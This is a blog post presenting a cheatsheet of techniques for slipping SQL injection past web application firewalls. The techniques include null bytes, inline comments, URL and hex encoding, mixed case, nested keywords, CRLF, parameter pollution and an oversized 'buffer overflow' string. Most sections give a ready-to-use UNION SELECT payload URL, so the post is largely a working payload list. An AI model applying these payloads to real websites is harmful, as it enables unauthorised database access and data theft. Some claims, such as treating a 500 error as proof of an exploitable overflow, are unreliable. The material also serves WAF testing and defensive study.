i SQL injection bypass cheatsheet – All things in moderation

SQL injection bypass cheatsheet

SQL injection

SQL Injection is one of the many web attack types, an attacker can send request with malicious SQL statements then executed by database server.

A successful SQL injection exploit Attacker can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), read/write file into system, execute os commands.

WAF

WAF (Web Application Firewall) is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection.

SQL Injection Bypass WAF Techniques

1. Null Bytes

To perform a null byte attack, you simply need to supply a URL-encoded null byte (%00) prior to the string you want bypass blocking.

Example:
http://example.com/news.php?id=1+%00’union+select+1,2,3′–

2. SQL comment

SQL comments /**/ allow us to bypass a lot of filtering and WAFs.

Example:

http://example.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3–

3. URL endcoding

Replace some charactor filtered by WAF with url endcode:

Example:

http://example.com/news.php?id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4—

4. Encode to hex forbidden

You can do that with function [/%2A%2A/] & [%2F**%2F]

Example:

http://example.com/news.php?id=-1/%2A%2A/union/%2A%2A/select/%2A%2A/1,2,3,4,5 –+-

http://example.com/news.php?id=-1%2F%2Funion%2F%2Fselect%2F**%2F1,2,3,4,5 –+-

5. Case Changing

Some WAF’s don’t have any rule or signatures to detect upper cases, only lowercase SQL keyword.

For example bypass regex filter: “/union\sselect/g”

http://example.com/news.php?id=-1+UnIoN//SeLecT//1,2,3–+-

6. Replaced Keywords

Some application and WAFs use preg_replace to remove all SQL keyword but not using in Recursion Algorithm. So you can bypass easily.

http://example.com/news.php?id=-1+UNunionION+SEselectLECT+1,2,3–+

Some case SQL keyword was filtered out and replaced with whitespace. So you can use “%0b” to bypass.

http://example.com/news.php?id=-1+uni%0bon+se%0blect+1,2,3–+-

7. WAF Bypassing – using characters

You can use some characters following : |, ?, “, ‘, *, %, £ , [], ;, :, \/, $, €, ()…

Example:

http://example.com/news.php?id=-1+uni*on+sel*ect+1,2,3,4–+-

8. CRLF WAF Bypass technique

CRLF means “Carriage Return, Line Feed” which is windows newline in text format (\r\n), just LF in unix (\n). you can use this technique to bypass WAF like following example.

Example:

http://example.com/news.php?id=-1+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 —

9. HTTP Parameter Pollution (HPP)

HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate or retrieve hidden information.

Example:

http://example.com/news.php?id=1;select+1&id=2,3+from+users+where+id=1–

http://example.com/news.php?id=-1/* &id= */union/* &id= */select/* &id= */1,2 —

10. Buffer OverFlow

Many Firewalls are developed in C and you can Crash them using Buffer Overflow.

You can test if the WAF can be crashed by typing following:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method.

Exploit example:

?page_id=1+and(/*!50000select*/ 1)=(/*!32302select*/
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
+/*!uNIOn*/+/*!SeLECt*/+1,2,3 –+-

References

SQL Injection Bypassing WAF

One Response

  1. hackanonymos March 22, 2018

Leave a Reply